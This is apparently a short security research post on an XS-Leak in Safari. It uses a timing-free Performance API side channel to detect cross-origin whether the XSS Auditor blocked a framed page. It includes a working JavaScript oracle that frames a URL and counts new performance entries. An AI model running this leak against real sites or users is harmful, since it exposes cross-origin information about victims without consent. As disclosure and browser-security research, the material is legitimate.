XS-Leaks - Detecting XSS-Auditor in Safari
Safari (13.0.4 and newer) will not log iframe requests in the Performance API list when the framed page is blocked by the XSS Auditor. So the length of performance.getEntries() before and after loading an iframe leaks whether the Auditor fired for that URL.

```javascript
// Load `url` in a hidden iframe and report how many new Performance entries appeared.
// Safari omits the iframe request from the Performance API when the XSS Auditor
// blocked the framed page, so the delta distinguishes the two outcomes.
const check = async (url) => {
  let perfEntries = performance.getEntries().length
  return new Promise(r => {
    let frame = document.createElement('iframe')
    frame.src = url
    frame.onload = (e) => {
      e.target.remove()
      return r(performance.getEntries().length - perfEntries)
    }
    // framesdiv is a container element in the page; fall back to <body> if absent
    ;(document.getElementById('framesdiv') || document.body).appendChild(frame)
  })
}
// r(0) = XSS auditor triggered
// r(1) = no XSS auditor
```

XS-Leaks with Performance API

Since the XSS Auditor got removed from Chrome 78+, I was wondering if you could still detect it cross-origin in Safari. In Safari, the blocked page is just replaced with an empty page instead of changing to an error page like in Chrome. This makes it harder to detect.
...